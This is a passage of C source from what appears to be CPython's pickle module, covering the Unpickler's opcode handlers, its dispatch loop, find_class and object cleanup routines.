if (Py_SIZE(self->stack) - i < 1)
return Pdata_stack_underflow(self->stack);
args = Pdata_poptuple(self->stack, i + 1);
if (args == NULL)
return -1;
PDATA_POP(self->stack, cls);
if (cls) {
obj = instantiate(cls, args);
Py_DECREF(cls);
}
Py_DECREF(args);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_inst(UnpicklerObject *self)
{
PyObject *cls = NULL;
PyObject *args = NULL;
PyObject *obj = NULL;
PyObject *module_name;
PyObject *class_name;
Py_ssize_t len;
Py_ssize_t i;
char *s;
if ((i = marker(self)) < 0)
return -1;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
/* Here it is safe to use PyUnicode_DecodeASCII(), even though non-ASCII
identifiers are permitted in Python 3.0, since the INST opcode is only
supported by older protocols on Python 2.x. */
module_name = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (module_name == NULL)
return -1;
if ((len = _Unpickler_Readline(self, &s)) >= 0) {
if (len < 2) {
Py_DECREF(module_name);
return bad_readline();
}
class_name = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (class_name != NULL) {
cls = find_class(self, module_name, class_name);
Py_DECREF(class_name);
}
}
Py_DECREF(module_name);
if (cls == NULL)
return -1;
if ((args = Pdata_poptuple(self->stack, i)) != NULL) {
obj = instantiate(cls, args);
Py_DECREF(args);
}
Py_DECREF(cls);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_newobj(UnpicklerObject *self)
{
PyObject *args = NULL;
PyObject *clsraw = NULL;
PyTypeObject *cls; /* clsraw cast to its true type */
PyObject *obj;
PickleState *st = _Pickle_GetGlobalState();
/* Stack is ... cls argtuple, and we want to call
* cls.__new__(cls, *argtuple).
*/
PDATA_POP(self->stack, args);
if (args == NULL)
goto error;
if (!PyTuple_Check(args)) {
PyErr_SetString(st->UnpicklingError,
"NEWOBJ expected an arg " "tuple.");
goto error;
}
PDATA_POP(self->stack, clsraw);
cls = (PyTypeObject *)clsraw;
if (cls == NULL)
goto error;
if (!PyType_Check(cls)) {
PyErr_SetString(st->UnpicklingError, "NEWOBJ class argument "
"isn't a type object");
goto error;
}
if (cls->tp_new == NULL) {
PyErr_SetString(st->UnpicklingError, "NEWOBJ class argument "
"has NULL tp_new");
goto error;
}
/* Call __new__. */
obj = cls->tp_new(cls, args, NULL);
if (obj == NULL)
goto error;
Py_DECREF(args);
Py_DECREF(clsraw);
PDATA_PUSH(self->stack, obj, -1);
return 0;
error:
Py_XDECREF(args);
Py_XDECREF(clsraw);
return -1;
}
static int
load_newobj_ex(UnpicklerObject *self)
{
PyObject *cls, *args, *kwargs;
PyObject *obj;
PickleState *st = _Pickle_GetGlobalState();
PDATA_POP(self->stack, kwargs);
if (kwargs == NULL) {
return -1;
}
PDATA_POP(self->stack, args);
if (args == NULL) {
Py_DECREF(kwargs);
return -1;
}
PDATA_POP(self->stack, cls);
if (cls == NULL) {
Py_DECREF(kwargs);
Py_DECREF(args);
return -1;
}
if (!PyType_Check(cls)) {
Py_DECREF(kwargs);
Py_DECREF(args);
PyErr_Format(st->UnpicklingError,
"NEWOBJ_EX class argument must be a type, not %.200s",
Py_TYPE(cls)->tp_name);
Py_DECREF(cls);
return -1;
}
if (((PyTypeObject *)cls)->tp_new == NULL) {
Py_DECREF(kwargs);
Py_DECREF(args);
Py_DECREF(cls);
PyErr_SetString(st->UnpicklingError,
"NEWOBJ_EX class argument doesn't have __new__");
return -1;
}
obj = ((PyTypeObject *)cls)->tp_new((PyTypeObject *)cls, args, kwargs);
Py_DECREF(kwargs);
Py_DECREF(args);
Py_DECREF(cls);
if (obj == NULL) {
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_global(UnpicklerObject *self)
{
PyObject *global = NULL;
PyObject *module_name;
PyObject *global_name;
Py_ssize_t len;
char *s;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
module_name = PyUnicode_DecodeUTF8(s, len - 1, "strict");
if (!module_name)
return -1;
if ((len = _Unpickler_Readline(self, &s)) >= 0) {
if (len < 2) {
Py_DECREF(module_name);
return bad_readline();
}
global_name = PyUnicode_DecodeUTF8(s, len - 1, "strict");
if (global_name) {
global = find_class(self, module_name, global_name);
Py_DECREF(global_name);
}
}
Py_DECREF(module_name);
if (global == NULL)
return -1;
PDATA_PUSH(self->stack, global, -1);
return 0;
}
static int
load_stack_global(UnpicklerObject *self)
{
PyObject *global;
PyObject *module_name;
PyObject *global_name;
PDATA_POP(self->stack, global_name);
PDATA_POP(self->stack, module_name);
if (module_name == NULL || !PyUnicode_CheckExact(module_name) ||
global_name == NULL || !PyUnicode_CheckExact(global_name)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "STACK_GLOBAL requires str");
Py_XDECREF(global_name);
Py_XDECREF(module_name);
return -1;
}
global = find_class(self, module_name, global_name);
Py_DECREF(global_name);
Py_DECREF(module_name);
if (global == NULL)
return -1;
PDATA_PUSH(self->stack, global, -1);
return 0;
}
static int
load_persid(UnpicklerObject *self)
{
PyObject *pid, *obj;
Py_ssize_t len;
char *s;
if (self->pers_func) {
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 1)
return bad_readline();
pid = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (pid == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeDecodeError)) {
PyErr_SetString(_Pickle_GetGlobalState()->UnpicklingError,
"persistent IDs in protocol 0 must be "
"ASCII strings");
}
return -1;
}
obj = call_method(self->pers_func, self->pers_func_self, pid);
Py_DECREF(pid);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"A load persistent id instruction was encountered,\n"
"but no persistent_load function was specified.");
return -1;
}
}
static int
load_binpersid(UnpicklerObject *self)
{
PyObject *pid, *obj;
if (self->pers_func) {
PDATA_POP(self->stack, pid);
if (pid == NULL)
return -1;
obj = call_method(self->pers_func, self->pers_func_self, pid);
Py_DECREF(pid);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"A load persistent id instruction was encountered,\n"
"but no persistent_load function was specified.");
return -1;
}
}
static int
load_pop(UnpicklerObject *self)
{
Py_ssize_t len = Py_SIZE(self->stack);
/* Note that we split the (pickle.py) stack into two stacks,
* an object stack and a mark stack. We have to be clever and
* pop the right one. We do this by looking at the top of the
* mark stack first, and only signalling a stack underflow if
* the object stack is empty and the mark stack doesn't match
* our expectations.
*/
if (self->num_marks > 0 && self->marks[self->num_marks - 1] == len) {
self->num_marks--;
self->stack->mark_set = self->num_marks != 0;
self->stack->fence = self->num_marks ?
self->marks[self->num_marks - 1] : 0;
} else if (len <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
else {
len--;
Py_DECREF(self->stack->data[len]);
Py_SIZE(self->stack) = len;
}
return 0;
}
static int
load_pop_mark(UnpicklerObject *self)
{
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
Pdata_clear(self->stack, i);
return 0;
}
static int
load_dup(UnpicklerObject *self)
{
PyObject *last;
Py_ssize_t len = Py_SIZE(self->stack);
if (len <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
last = self->stack->data[len - 1];
PDATA_APPEND(self->stack, last, -1);
return 0;
}
static int
load_get(UnpicklerObject *self)
{
PyObject *key, *value;
Py_ssize_t idx;
Py_ssize_t len;
char *s;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
key = PyLong_FromString(s, NULL, 10);
if (key == NULL)
return -1;
idx = PyLong_AsSsize_t(key);
if (idx == -1 && PyErr_Occurred()) {
Py_DECREF(key);
return -1;
}
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
if (!PyErr_Occurred())
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
return -1;
}
Py_DECREF(key);
PDATA_APPEND(self->stack, value, -1);
return 0;
}
static int
load_binget(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
idx = Py_CHARMASK(s[0]);
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
PyObject *key = PyLong_FromSsize_t(idx);
if (key != NULL) {
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
}
return -1;
}
PDATA_APPEND(self->stack, value, -1);
return 0;
}
static int
load_long_binget(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
idx = calc_binsize(s, 4);
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
PyObject *key = PyLong_FromSsize_t(idx);
if (key != NULL) {
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
}
return -1;
}
PDATA_APPEND(self->stack, value, -1);
return 0;
}
/* Push an object from the extension registry (EXT[124]). nbytes is
* the number of bytes following the opcode, holding the index (code) value.
*/
static int
load_extension(UnpicklerObject *self, int nbytes)
{
char *codebytes; /* the nbytes bytes after the opcode */
long code; /* calc_binint returns long */
PyObject *py_code; /* code as a Python int */
PyObject *obj; /* the object to push */
PyObject *pair; /* (module_name, class_name) */
PyObject *module_name, *class_name;
PickleState *st = _Pickle_GetGlobalState();
assert(nbytes == 1 || nbytes == 2 || nbytes == 4);
if (_Unpickler_Read(self, &codebytes, nbytes) < 0)
return -1;
code = calc_binint(codebytes, nbytes);
if (code <= 0) { /* note that 0 is forbidden */
/* Corrupt or hostile pickle. */
PyErr_SetString(st->UnpicklingError, "EXT specifies code <= 0");
return -1;
}
/* Look for the code in the cache. */
py_code = PyLong_FromLong(code);
if (py_code == NULL)
return -1;
obj = PyDict_GetItemWithError(st->extension_cache, py_code);
if (obj != NULL) {
/* Bingo. */
Py_DECREF(py_code);
PDATA_APPEND(self->stack, obj, -1);
return 0;
}
if (PyErr_Occurred()) {
Py_DECREF(py_code);
return -1;
}
/* Look up the (module_name, class_name) pair. */
pair = PyDict_GetItemWithError(st->inverted_registry, py_code);
if (pair == NULL) {
Py_DECREF(py_code);
if (!PyErr_Occurred()) {
PyErr_Format(PyExc_ValueError, "unregistered extension "
"code %ld", code);
}
return -1;
}
/* Since the extension registry is manipulable via Python code,
* confirm that pair is really a 2-tuple of strings.
*/
if (!PyTuple_Check(pair) || PyTuple_Size(pair) != 2 ||
!PyUnicode_Check(module_name = PyTuple_GET_ITEM(pair, 0)) ||
!PyUnicode_Check(class_name = PyTuple_GET_ITEM(pair, 1))) {
Py_DECREF(py_code);
PyErr_Format(PyExc_ValueError, "_inverted_registry[%ld] "
"isn't a 2-tuple of strings", code);
return -1;
}
/* Load the object. */
obj = find_class(self, module_name, class_name);
if (obj == NULL) {
Py_DECREF(py_code);
return -1;
}
/* Cache code -> obj. */
code = PyDict_SetItem(st->extension_cache, py_code, obj);
Py_DECREF(py_code);
if (code < 0) {
Py_DECREF(obj);
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_put(UnpicklerObject *self)
{
PyObject *key, *value;
Py_ssize_t idx;
Py_ssize_t len;
char *s = NULL;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
key = PyLong_FromString(s, NULL, 10);
if (key == NULL)
return -1;
idx = PyLong_AsSsize_t(key);
Py_DECREF(key);
if (idx < 0) {
if (!PyErr_Occurred())
PyErr_SetString(PyExc_ValueError,
"negative PUT argument");
return -1;
}
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_binput(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
idx = Py_CHARMASK(s[0]);
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_long_binput(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
idx = calc_binsize(s, 4);
if (idx < 0) {
PyErr_SetString(PyExc_ValueError,
"negative LONG_BINPUT argument");
return -1;
}
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_memoize(UnpicklerObject *self)
{
PyObject *value;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
return _Unpickler_MemoPut(self, self->memo_len, value);
}
static int
do_append(UnpicklerObject *self, Py_ssize_t x)
{
PyObject *value;
PyObject *slice;
PyObject *list;
PyObject *result;
Py_ssize_t len, i;
len = Py_SIZE(self->stack);
if (x > len || x <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == x) /* nothing to do */
return 0;
list = self->stack->data[x - 1];
if (PyList_CheckExact(list)) {
Py_ssize_t list_len;
int ret;
slice = Pdata_poplist(self->stack, x);
if (!slice)
return -1;
list_len = PyList_GET_SIZE(list);
ret = PyList_SetSlice(list, list_len, list_len, slice);
Py_DECREF(slice);
return ret;
}
else {
PyObject *extend_func;
_Py_IDENTIFIER(extend);
extend_func = _PyObject_GetAttrId(list, &PyId_extend);
if (extend_func != NULL) {
slice = Pdata_poplist(self->stack, x);
if (!slice) {
Py_DECREF(extend_func);
return -1;
}
result = _Pickle_FastCall(extend_func, slice);
Py_DECREF(extend_func);
if (result == NULL)
return -1;
Py_DECREF(result);
}
else {
PyObject *append_func;
_Py_IDENTIFIER(append);
/* Even if the PEP 307 requires extend() and append() methods,
fall back on append() if the object has no extend() method
for backward compatibility. */
PyErr_Clear();
append_func = _PyObject_GetAttrId(list, &PyId_append);
if (append_func == NULL)
return -1;
for (i = x; i < len; i++) {
value = self->stack->data[i];
result = _Pickle_FastCall(append_func, value);
if (result == NULL) {
Pdata_clear(self->stack, i + 1);
Py_SIZE(self->stack) = x;
Py_DECREF(append_func);
return -1;
}
Py_DECREF(result);
}
Py_SIZE(self->stack) = x;
Py_DECREF(append_func);
}
}
return 0;
}
static int
load_append(UnpicklerObject *self)
{
if (Py_SIZE(self->stack) - 1 <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
return do_append(self, Py_SIZE(self->stack) - 1);
}
static int
load_appends(UnpicklerObject *self)
{
Py_ssize_t i = marker(self);
if (i < 0)
return -1;
return do_append(self, i);
}
static int
do_setitems(UnpicklerObject *self, Py_ssize_t x)
{
PyObject *value, *key;
PyObject *dict;
Py_ssize_t len, i;
int status = 0;
len = Py_SIZE(self->stack);
if (x > len || x <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == x) /* nothing to do */
return 0;
if ((len - x) % 2 != 0) {
PickleState *st = _Pickle_GetGlobalState();
/* Currupt or hostile pickle -- we never write one like this. */
PyErr_SetString(st->UnpicklingError,
"odd number of items for SETITEMS");
return -1;
}
/* Here, dict does not actually need to be a PyDict; it could be anything
that supports the __setitem__ attribute. */
dict = self->stack->data[x - 1];
for (i = x + 1; i < len; i += 2) {
key = self->stack->data[i - 1];
value = self->stack->data[i];
if (PyObject_SetItem(dict, key, value) < 0) {
status = -1;
break;
}
}
Pdata_clear(self->stack, x);
return status;
}
static int
load_setitem(UnpicklerObject *self)
{
return do_setitems(self, Py_SIZE(self->stack) - 2);
}
static int
load_setitems(UnpicklerObject *self)
{
Py_ssize_t i = marker(self);
if (i < 0)
return -1;
return do_setitems(self, i);
}
static int
load_additems(UnpicklerObject *self)
{
PyObject *set;
Py_ssize_t mark, len, i;
mark = marker(self);
if (mark < 0)
return -1;
len = Py_SIZE(self->stack);
if (mark > len || mark <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == mark) /* nothing to do */
return 0;
set = self->stack->data[mark - 1];
if (PySet_Check(set)) {
PyObject *items;
int status;
items = Pdata_poptuple(self->stack, mark);
if (items == NULL)
return -1;
status = _PySet_Update(set, items);
Py_DECREF(items);
return status;
}
else {
PyObject *add_func;
_Py_IDENTIFIER(add);
add_func = _PyObject_GetAttrId(set, &PyId_add);
if (add_func == NULL)
return -1;
for (i = mark; i < len; i++) {
PyObject *result;
PyObject *item;
item = self->stack->data[i];
result = _Pickle_FastCall(add_func, item);
if (result == NULL) {
Pdata_clear(self->stack, i + 1);
Py_SIZE(self->stack) = mark;
return -1;
}
Py_DECREF(result);
}
Py_SIZE(self->stack) = mark;
}
return 0;
}
static int
load_build(UnpicklerObject *self)
{
PyObject *state, *inst, *slotstate;
PyObject *setstate;
int status = 0;
_Py_IDENTIFIER(__setstate__);
/* Stack is ... instance, state. We want to leave instance at
* the stack top, possibly mutated via instance.__setstate__(state).
*/
if (Py_SIZE(self->stack) - 2 < self->stack->fence)
return Pdata_stack_underflow(self->stack);
PDATA_POP(self->stack, state);
if (state == NULL)
return -1;
inst = self->stack->data[Py_SIZE(self->stack) - 1];
if (_PyObject_LookupAttrId(inst, &PyId___setstate__, &setstate) < 0) {
Py_DECREF(state);
return -1;
}
if (setstate != NULL) {
PyObject *result;
/* The explicit __setstate__ is responsible for everything. */
result = _Pickle_FastCall(setstate, state);
Py_DECREF(setstate);
if (result == NULL)
return -1;
Py_DECREF(result);
return 0;
}
/* A default __setstate__. First see whether state embeds a
* slot state dict too (a proto 2 addition).
*/
if (PyTuple_Check(state) && PyTuple_GET_SIZE(state) == 2) {
PyObject *tmp = state;
state = PyTuple_GET_ITEM(tmp, 0);
slotstate = PyTuple_GET_ITEM(tmp, 1);
Py_INCREF(state);
Py_INCREF(slotstate);
Py_DECREF(tmp);
}
else
slotstate = NULL;
/* Set inst.__dict__ from the state dict (if any). */
if (state != Py_None) {
PyObject *dict;
PyObject *d_key, *d_value;
Py_ssize_t i;
_Py_IDENTIFIER(__dict__);
if (!PyDict_Check(state)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "state is not a dictionary");
goto error;
}
dict = _PyObject_GetAttrId(inst, &PyId___dict__);
if (dict == NULL)
goto error;
i = 0;
while (PyDict_Next(state, &i, &d_key, &d_value)) {
/* normally the keys for instance attributes are
interned. we should try to do that here. */
Py_INCREF(d_key);
if (PyUnicode_CheckExact(d_key))
PyUnicode_InternInPlace(&d_key);
if (PyObject_SetItem(dict, d_key, d_value) < 0) {
Py_DECREF(d_key);
goto error;
}
Py_DECREF(d_key);
}
Py_DECREF(dict);
}
/* Also set instance attributes from the slotstate dict (if any). */
if (slotstate != NULL) {
PyObject *d_key, *d_value;
Py_ssize_t i;
if (!PyDict_Check(slotstate)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"slot state is not a dictionary");
goto error;
}
i = 0;
while (PyDict_Next(slotstate, &i, &d_key, &d_value)) {
if (PyObject_SetAttr(inst, d_key, d_value) < 0)
goto error;
}
}
if (0) {
error:
status = -1;
}
Py_DECREF(state);
Py_XDECREF(slotstate);
return status;
}
static int
load_mark(UnpicklerObject *self)
{
/* Note that we split the (pickle.py) stack into two stacks, an
* object stack and a mark stack. Here we push a mark onto the
* mark stack.
*/
if (self->num_marks >= self->marks_size) {
size_t alloc = ((size_t)self->num_marks << 1) + 20;
Py_ssize_t *marks_new = self->marks;
PyMem_RESIZE(marks_new, Py_ssize_t, alloc);
if (marks_new == NULL) {
PyErr_NoMemory();
return -1;
}
self->marks = marks_new;
self->marks_size = (Py_ssize_t)alloc;
}
self->stack->mark_set = 1;
self->marks[self->num_marks++] = self->stack->fence = Py_SIZE(self->stack);
return 0;
}
static int
load_reduce(UnpicklerObject *self)
{
PyObject *callable = NULL;
PyObject *argtup = NULL;
PyObject *obj = NULL;
PDATA_POP(self->stack, argtup);
if (argtup == NULL)
return -1;
PDATA_POP(self->stack, callable);
if (callable) {
obj = PyObject_CallObject(callable, argtup);
Py_DECREF(callable);
}
Py_DECREF(argtup);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
/* Just raises an error if we don't know the protocol specified. PROTO
* is the first opcode for protocols >= 2.
*/
static int
load_proto(UnpicklerObject *self)
{
char *s;
int i;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
i = (unsigned char)s[0];
if (i <= HIGHEST_PROTOCOL) {
self->proto = i;
return 0;
}
PyErr_Format(PyExc_ValueError, "unsupported pickle protocol: %d", i);
return -1;
}
static int
load_frame(UnpicklerObject *self)
{
char *s;
Py_ssize_t frame_len;
if (_Unpickler_Read(self, &s, 8) < 0)
return -1;
frame_len = calc_binsize(s, 8);
if (frame_len < 0) {
PyErr_Format(PyExc_OverflowError,
"FRAME length exceeds system's maximum of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, frame_len) < 0)
return -1;
/* Rewind to start of frame */
self->next_read_idx -= frame_len;
return 0;
}
static PyObject *
load(UnpicklerObject *self)
{
PyObject *value = NULL;
char *s = NULL;
self->num_marks = 0;
self->stack->mark_set = 0;
self->stack->fence = 0;
self->proto = 0;
if (Py_SIZE(self->stack))
Pdata_clear(self->stack, 0);
/* Convenient macros for the dispatch while-switch loop just below. */
#define OP(opcode, load_func) \
case opcode: if (load_func(self) < 0) break; continue;
#define OP_ARG(opcode, load_func, arg) \
case opcode: if (load_func(self, (arg)) < 0) break; continue;
while (1) {
if (_Unpickler_Read(self, &s, 1) < 0) {
PickleState *st = _Pickle_GetGlobalState();
if (PyErr_ExceptionMatches(st->UnpicklingError)) {
PyErr_Format(PyExc_EOFError, "Ran out of input");
}
return NULL;
}
switch ((enum opcode)s[0]) {
OP(NONE, load_none)
OP(BININT, load_binint)
OP(BININT1, load_binint1)
OP(BININT2, load_binint2)
OP(INT, load_int)
OP(LONG, load_long)
OP_ARG(LONG1, load_counted_long, 1)
OP_ARG(LONG4, load_counted_long, 4)
OP(FLOAT, load_float)
OP(BINFLOAT, load_binfloat)
OP_ARG(SHORT_BINBYTES, load_counted_binbytes, 1)
OP_ARG(BINBYTES, load_counted_binbytes, 4)
OP_ARG(BINBYTES8, load_counted_binbytes, 8)
OP_ARG(SHORT_BINSTRING, load_counted_binstring, 1)
OP_ARG(BINSTRING, load_counted_binstring, 4)
OP(STRING, load_string)
OP(UNICODE, load_unicode)
OP_ARG(SHORT_BINUNICODE, load_counted_binunicode, 1)
OP_ARG(BINUNICODE, load_counted_binunicode, 4)
OP_ARG(BINUNICODE8, load_counted_binunicode, 8)
OP_ARG(EMPTY_TUPLE, load_counted_tuple, 0)
OP_ARG(TUPLE1, load_counted_tuple, 1)
OP_ARG(TUPLE2, load_counted_tuple, 2)
OP_ARG(TUPLE3, load_counted_tuple, 3)
OP(TUPLE, load_tuple)
OP(EMPTY_LIST, load_empty_list)
OP(LIST, load_list)
OP(EMPTY_DICT, load_empty_dict)
OP(DICT, load_dict)
OP(EMPTY_SET, load_empty_set)
OP(ADDITEMS, load_additems)
OP(FROZENSET, load_frozenset)
OP(OBJ, load_obj)
OP(INST, load_inst)
OP(NEWOBJ, load_newobj)
OP(NEWOBJ_EX, load_newobj_ex)
OP(GLOBAL, load_global)
OP(STACK_GLOBAL, load_stack_global)
OP(APPEND, load_append)
OP(APPENDS, load_appends)
OP(BUILD, load_build)
OP(DUP, load_dup)
OP(BINGET, load_binget)
OP(LONG_BINGET, load_long_binget)
OP(GET, load_get)
OP(MARK, load_mark)
OP(BINPUT, load_binput)
OP(LONG_BINPUT, load_long_binput)
OP(PUT, load_put)
OP(MEMOIZE, load_memoize)
OP(POP, load_pop)
OP(POP_MARK, load_pop_mark)
OP(SETITEM, load_setitem)
OP(SETITEMS, load_setitems)
OP(PERSID, load_persid)
OP(BINPERSID, load_binpersid)
OP(REDUCE, load_reduce)
OP(PROTO, load_proto)
OP(FRAME, load_frame)
OP_ARG(EXT1, load_extension, 1)
OP_ARG(EXT2, load_extension, 2)
OP_ARG(EXT4, load_extension, 4)
OP_ARG(NEWTRUE, load_bool, Py_True)
OP_ARG(NEWFALSE, load_bool, Py_False)
case STOP:
break;
default:
{
PickleState *st = _Pickle_GetGlobalState();
unsigned char c = (unsigned char) *s;
if (0x20 <= c && c <= 0x7e && c != '\'' && c != '\\') {
PyErr_Format(st->UnpicklingError,
"invalid load key, '%c'.", c);
}
else {
PyErr_Format(st->UnpicklingError,
"invalid load key, '\\x%02x'.", c);
}
return NULL;
}
}
break; /* and we are done! */
}
if (PyErr_Occurred()) {
return NULL;
}
if (_Unpickler_SkipConsumed(self) < 0)
return NULL;
PDATA_POP(self->stack, value);
return value;
}
/*[clinic input]
_pickle.Unpickler.load
Load a pickle.
Read a pickled object representation from the open file object given
in the constructor, and return the reconstituted object hierarchy
specified therein.
[clinic start generated code]*/
static PyObject *
_pickle_Unpickler_load_impl(UnpicklerObject *self)
/*[clinic end generated code: output=fdcc488aad675b14 input=acbb91a42fa9b7b9]*/
{
UnpicklerObject *unpickler = (UnpicklerObject*)self;
/* Check whether the Unpickler was initialized correctly. This prevents
segfaulting if a subclass overridden __init__ with a function that does
not call Unpickler.__init__(). Here, we simply ensure that self->read
is not NULL. */
if (unpickler->read == NULL) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->UnpicklingError,
"Unpickler.__init__() was not called by %s.__init__()",
Py_TYPE(unpickler)->tp_name);
return NULL;
}
return load(unpickler);
}
/* The name of find_class() is misleading. In newer pickle protocols, this
function is used for loading any global (i.e., functions), not just
classes. The name is kept only for backward compatibility. */
/*[clinic input]
_pickle.Unpickler.find_class
module_name: object
global_name: object
/
Return an object from a specified module.
If necessary, the module will be imported. Subclasses may override
this method (e.g. to restrict unpickling of arbitrary classes and
functions).
This method is called whenever a class or a function object is
needed. Both arguments passed are str objects.
[clinic start generated code]*/
static PyObject *
_pickle_Unpickler_find_class_impl(UnpicklerObject *self,
PyObject *module_name,
PyObject *global_name)
/*[clinic end generated code: output=becc08d7f9ed41e3 input=e2e6a865de093ef4]*/
{
PyObject *global;
PyObject *module;
/* Try to map the old names used in Python 2.x to the new ones used in
Python 3.x. We do this only with old pickle protocols and when the
user has not disabled the feature. */
if (self->proto < 3 && self->fix_imports) {
PyObject *key;
PyObject *item;
PickleState *st = _Pickle_GetGlobalState();
/* Check if the global (i.e., a function or a class) was renamed
or moved to another module. */
key = PyTuple_Pack(2, module_name, global_name);
if (key == NULL)
return NULL;
item = PyDict_GetItemWithError(st->name_mapping_2to3, key);
Py_DECREF(key);
if (item) {
if (!PyTuple_Check(item) || PyTuple_GET_SIZE(item) != 2) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING values should be "
"2-tuples, not %.200s", Py_TYPE(item)->tp_name);
return NULL;
}
module_name = PyTuple_GET_ITEM(item, 0);
global_name = PyTuple_GET_ITEM(item, 1);
if (!PyUnicode_Check(module_name) ||
!PyUnicode_Check(global_name)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING values should be "
"pairs of str, not (%.200s, %.200s)",
Py_TYPE(module_name)->tp_name,
Py_TYPE(global_name)->tp_name);
return NULL;
}
}
else if (PyErr_Occurred()) {
return NULL;
}
else {
/* Check if the module was renamed. */
item = PyDict_GetItemWithError(st->import_mapping_2to3, module_name);
if (item) {
if (!PyUnicode_Check(item)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.IMPORT_MAPPING values should be "
"strings, not %.200s", Py_TYPE(item)->tp_name);
return NULL;
}
module_name = item;
}
else if (PyErr_Occurred()) {
return NULL;
}
}
}
module = PyImport_GetModule(module_name);
if (module == NULL) {
if (PyErr_Occurred())
return NULL;
module = PyImport_Import(module_name);
if (module == NULL)
return NULL;
}
global = getattribute(module, global_name, self->proto >= 4);
Py_DECREF(module);
return global;
}
/*[clinic input]
_pickle.Unpickler.__sizeof__ -> Py_ssize_t
Returns size in memory, in bytes.
[clinic start generated code]*/
static Py_ssize_t
_pickle_Unpickler___sizeof___impl(UnpicklerObject *self)
/*[clinic end generated code: output=119d9d03ad4c7651 input=13333471fdeedf5e]*/
{
Py_ssize_t res;
res = _PyObject_SIZE(Py_TYPE(self));
if (self->memo != NULL)
res += self->memo_size * sizeof(PyObject *);
if (self->marks != NULL)
res += self->marks_size * sizeof(Py_ssize_t);
if (self->input_line != NULL)
res += strlen(self->input_line) + 1;
if (self->encoding != NULL)
res += strlen(self->encoding) + 1;
if (self->errors != NULL)
res += strlen(self->errors) + 1;
return res;
}
static struct PyMethodDef Unpickler_methods[] = {
_PICKLE_UNPICKLER_LOAD_METHODDEF
_PICKLE_UNPICKLER_FIND_CLASS_METHODDEF
_PICKLE_UNPICKLER___SIZEOF___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
Unpickler_dealloc(UnpicklerObject *self)
{
PyObject_GC_UnTrack((PyObject *)self);
Py_XDECREF(self->readline);
Py_XDECREF(self->read);
Py_XDECREF(self->peek);
Py_XDECREF(self->stack);
Py_XDECREF(self->pers_func);
if (self->buffer.buf != NULL) {
PyBuffer_Release(&self->buffer);
self->buffer.buf = NULL;
}
_Unpickler_MemoCleanup(self);
PyMem_Free(self->marks);
PyMem_Free(self->input_line);
PyMem_Free(self->encoding);
PyMem_Free(self->errors);
Py_TYPE(self)->tp_free((PyObject *)self);
}
static int
